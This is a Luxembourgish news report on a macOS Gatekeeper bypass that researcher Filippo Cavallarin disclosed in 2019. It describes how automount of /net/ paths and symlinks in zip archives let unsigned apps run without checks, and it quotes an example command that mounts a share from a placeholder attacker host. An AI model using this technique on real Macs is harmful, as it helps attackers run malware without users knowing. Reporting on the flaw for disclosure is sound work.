Et ass einfach eng béiswëlleg App op engem Mac z'installéieren. Apple huet de Feeler och no dräi Méint net fixéiert

27. 5. 2019

Sécherheetsfuerscher Filippo Cavallarin huet eng Warnung iwwer de Feeler am macOS 10.14.5 op sengem Blog gepost. Dëst besteet aus der Méiglechkeet d'Sécherheetsmesuren vum Gatekeeper komplett ëmzegoen. Laut Cavallarin huet hien Apple schonn am Februar vun dësem Joer de Fehler drop higewisen, awer d'Firma huet et net am leschten Update fixéiert.

Gatekeeper gouf vun Apple entwéckelt an a sengem Desktop Betribssystem fir d'éischte Kéier an 2012 agebaut. Et ass e Mechanismus deen verhënnert datt eng Applikatioun ouni d'Wëssen an d'Zoustëmmung vum Benotzer leeft. Nodeems Dir eng App erofgelueden hutt, iwwerpréift Gatekeeper automatesch säi Code fir ze kucken ob d'Software richteg vun Apple ënnerschriwwen ass.

A sengem Blog Post seet de Cavallarin datt Gatekeeper, Par défaut, souwuel extern Späichere wéi och Netzwierkdeeler als sécher Plazen betruecht. All Applikatioun, déi an dësen Ziler wunnt, kann also automatesch lancéiert ginn ouni duerch de Gatekeeper Check ze goen. Et ass dës Feature déi exploitéiert ka ginn fir béiswëlleg Software ze lancéieren ouni de Benotzer säi Wëssen.

Een Aspekt deen onerlaabten Zougang erlaabt ass d'Automount Feature, déi d'Benotzer erlaabt automatesch en Netzwierk deelen einfach ze montéieren andeems Dir e Wee spezifizéiert deen mam "/ net/" fänkt. Als Beispill zitéiert de Cavallarin de Wee "ls /net/evil-attacker.com/sharedfolder/", deen de Betribssystem verursaache kann fir den Inhalt vun engem "Sharefolder" Dossier op enger Remoteplaz ze lueden, déi potenziell béiswëlleg ka sinn.

Dir kënnt kucken wéi d'Drohung am Video funktionnéiert:

En anere Faktor ass d'Tatsaach datt wann e Zip-Archiv mat engem spezifesche Symlink deen zur Automount Funktioun féiert, gedeelt gëtt, gëtt et net vum Gatekeeper iwwerpréift. Op dës Manéier kann d'Affer d'béisaarteg Archiv ganz einfach eroflueden an et unzipéieren, sou datt den Ugräifer praktesch all Software um Mac ouni d'Wëssen vum Benotzer ausféiert. De Finder, dee bestëmmte Verlängerungen par défaut verstoppt, huet och säin Deel vun dëser Schwachstelle.

De Cavallarin seet op sengem Blog datt Apple den 22. Februar vun dësem Joer op d'Schwachheet vum macOS Betribssystem opmierksam gemaach huet. Awer Mëtt Mee huet Apple opgehalen mat Cavallarin ze kommunizéieren, sou datt de Cavallarin decidéiert huet dat Ganzt ëffentlech ze maachen.

Source: FCVL

Themen: Stockage, automatesch, MacOS, Video, Astellungen, Funktioun, Benotzer, Applikatioun, Apple

Diskussioun vum Artikel

Ären Numm

Äre Kommentar

Andeems ech déi uewe genannten Donnéeën ausfëllen, erkennen ech datt d'Firma TEXT FACTORY s.r.o., registréiert Büro zu Brno, Durďákova 336/29, Černá Pole, Postleitzuel: 613 00, ID Nummer: 06157831, registréiert um Regional Geriichtshaff zu Brno, . f) GDPR a fir gesetzlech Verpflichtungen ze erfëllen (Artikel 100399, Abschnitt 6, Bréif c) GDPR), fir déi folgend Zwecker: d'Noutwennegkeet fir d'Autorisatioun vu Besucher op Websäiten ze garantéieren, déi vun TEXT FACTORY s.r.o. bedriwwe ginn, fir aktiv zu publizéierten Artikelen oder an der Diskussioun bäizedroen Forum'en an d'Rechter vun der TEXT FACTORY s.r.o. als Administrateur vun dësen Diskussiounsforen ausüben. Méi Informatioun iwwer d'Veraarbechtung vu perséinlechen Donnéeën a Rechter fannt Dir an Lektiounen iwwer perséinlech Dateschutz. de ganzen Text

Et kéint sinn interesséieren Iech

Zesummenhang